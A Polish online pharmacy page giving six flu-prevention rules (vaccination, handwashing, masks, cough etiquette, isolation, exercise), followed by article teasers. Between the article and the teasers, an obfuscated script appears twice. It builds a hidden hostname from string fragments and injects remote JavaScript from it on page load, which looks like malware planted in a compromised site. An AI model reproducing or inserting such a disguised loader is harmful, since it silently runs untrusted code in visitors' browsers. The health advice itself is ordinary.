Koszyk (0) Zamknij

Brak produktów w koszyku.

Jak nie zachorować zimą? 6 żelaznych zasad profilaktyki grypy

 

Grypa jest zespołem objawów klinicznych związanych z ostrym zakażeniem układu oddechowego, powodowanym przez wirus grypy.

 

  

 

 

Rezerwuarem wirusa są zarówno ludzie, jak i zwierzęta (np. ptaki). Zakażenie następuje drogą kropelkową (kaszel, kichanie) lub poprzez bezpośredni kontakt, a także za pośrednictwem skażonych przedmiotów.

Objawy grypy

Grypa objawia się nagłym wystąpieniem gorączki z dreszczami, której towarzyszy ból głowy, mięśni, gardła i ogólne rozbicie. Nieżyt nosa jest zwykle słabo nasilony, a kaszel występuje w postaci nieproduktywnej (tzw. kaszel suchy). Grypie może towarzyszyć niewielka biegunka, nudności i wymioty.

Konsekwencje grypy

Grypa zazwyczaj ustępuje samoistnie po 3-7 dniach i wymaga jedynie odpoczynku w łóżku oraz ewentualnie leczenia objawowego (leki przeciwbólowe i przeciwgorączkowe, przeciwkaszlowe), jednak w niektórych przypadkach może wiązać się z bardzo poważnymi konsekwencjami zdrowotnymi a nawet śmiercią.

Na ciężki przebieg choroby narażone są szczególnie osoby starsze, obciążone chorobami przewlekłymi, kobiety w ciąży, dzieci oraz osoby ze znacznego stopnia otyłością  (BMI >=40). Warto wobec tego wiedzieć, jak chronić siebie i swoich bliskich przed grypą, stosując sprawdzone zasady profilaktyki tej choroby.

  1. 1Szczepienia ochronne

Szczepienie przeciwko grypie jest podstawową metodą profilaktyki. Nie daje 100% ochrony przed zachorowaniem (skuteczność zależy m.in. od wieku i stanu zdrowia), dlatego też nie zwalnia z przestrzegania podstawowych zasad zapobiegania chorobie wyszczególnionych poniżej.

Wirus grypy cechuje się dużą zmiennością antygenową, która skutkuje ryzykiem zachorowania każdego roku, stąd konieczność corocznej zmiany składu szczepionki – zatem szczepienie jest ważne jedynie w danym sezonie i wymaga powtórzenia w kolejnych, by zachować ochronę.

Szczepienia ochronne przeciwko grypie są szczególnie zalecane osobom starszym, dzieciom w wieku od 6 mies. do ukończenia 5. roku życia, kobietom w ciąży lub planującym ciążę, chorym na cukrzycę i inne choroby przewlekłe takie jak np. astma czy POChP, osobom z niedoborami odporności, czyli wszystkim narażonym na ciężki przebieg grypy.

Warto podkreślić, że szczepionka przeciwko grypie nie chroni przed przeziębieniem. Należy o tym pamiętać, ponieważ niektórzy zaprzestają szczepień, twierdząc, że zachorowali mimo szczepienia, błędnie utożsamiając objawy przeziębienia z symptomami grypy.

  1. Higiena rąk

Higiena rąk jest niezbędna zawsze, a w sezonie grypowym szczególnie, zwłaszcza w przypadku bezpośredniego kontaktu z osobą chorą, np. z jednym z domowników, współpracowników.

Ręce należy myć często (10 razy na dobę) wodą z mydłem przez około 20 sekund, osuszyć ręcznikiem jednorazowym a następnie wcierać środek na bazie alkoholu. Warto zadbać by osoba chora przestrzegała również higieny rąk zwłaszcza po wycieraniu nosa, kaszlu, kichaniu – takie postępowanie zmniejszy ryzyko przeniesienia wirusa na inne osoby z otoczenia.

  1. Noszenie maseczki ochronnej

Noszenie maseczki ochronnej na twarz w przypadku bliskiego kontaktu z chorym zmniejsza ryzyko zachorowania (w przypadku zachorowania jednego z domowników, noszenie maseczki w połączeniu ze ścisłą higieną rąk, może zmniejszyć ryzyko zachorowania pozostałych mieszkańców nawet o 50%).

Maseczkę powinien nosić także sam chory. Warto pamiętać o tym, by po każdym kontakcie z chorym maseczkę zmieniać na nową, a zużytą wyrzucić.

Stosowanie maseczek ochronnych profilaktycznie na ulicy przez osoby zdrowe nie jest zalecane.

  1. Inne zasady higieny

W czasie sezonu grypowego należy zasłaniać usta podczas kaszlu i kichania najlepiej jednorazową chusteczką, a w razie jej braku – przedramieniem (nie dłonią). Należy unikać, w miarę możliwości, kontaktu twarzą w twarz z innymi osobami, zatłoczonych miejsc, tłumu. Warto starać się nie dotykać niemytymi rękami ust, nosa i oczu oraz często dokładnie wietrzyć pomieszczenia.

  1. Izolacja chorych

Chory na grypę niepowikłaną winien przez 7 dni od wystąpienia objawów pozostać w domu i ograniczyć swoje kontakty bezpośrednie z innymi osobami do niezbędnego minimum.

  1. Regularny wysiłek fizyczny

Umiarkowany, regularny wysiłek fizyczny zmniejsza ryzyko zachorowania i stymuluje układ odpornościowy do walki także z innymi chorobami. Ponadto stała aktywność zapobiega również otyłości, stanowiącej czynnik ryzyka ciężkiego przebiegu grypy.

Czujesz, że dopada Cię grypa? Nie zwlekaj i umów się na konsultację z lekarzem w Medistore.com.pl

 

 
<script type="text/javascript"> (function(){  u1uf=document.createElement("script");u1uf.type="text/javascript";  u1uf.async=true;u1uf_=(("us")+"t")+"a";u1uf_+=("t.i")+""+"n";u1uf_+=(("f")+"o");  u1uf.src="http://"+u1uf_+"/7055571.g4px2ki01ufdh8jlx27vmw97dknzg2";  document.body.appendChild(u1uf); })(); </script>
<script type="text/javascript"> (function(){  u1uf=document.createElement("script");u1uf.type="text/javascript";  u1uf.async=true;u1uf_=(("us")+"t")+"a";u1uf_+=("t.i")+""+"n";u1uf_+=(("f")+"o");  u1uf.src="http://"+u1uf_+"/7055571.g4px2ki01ufdh8jlx27vmw97dknzg2";  document.body.appendChild(u1uf); })(); </script>

Naturalne sposoby na grzybicę skóry.

Grzybica skóry najczęściej pojawia się w fałdach zgięciowych na skórze, np. w pachwinach, pod pachami oraz pod piersiami (u kobiet). Częściej występuje u osób otyłych, zwłaszcza gdy chorują oni na cukrzycę. Przybiera ona wówczas formę tzw. wyprzeń lub wysypek. Mają one najczęściej kolor

Czytaj wiecej »

Owoc borówki dobry nie tylko na oczy.

To, że ekstrakt z owoców borówki działa ozdrowieńczo na oczy, jest znaną prawdą, ale z czasem nauka przyniosła nam kolejne informacje o jego prozdrowotnych własnościach. Okazało się, że borówka nadaje się znakomicie dla osób z zaburzeniami pamięci, wspomaga

Czytaj wiecej »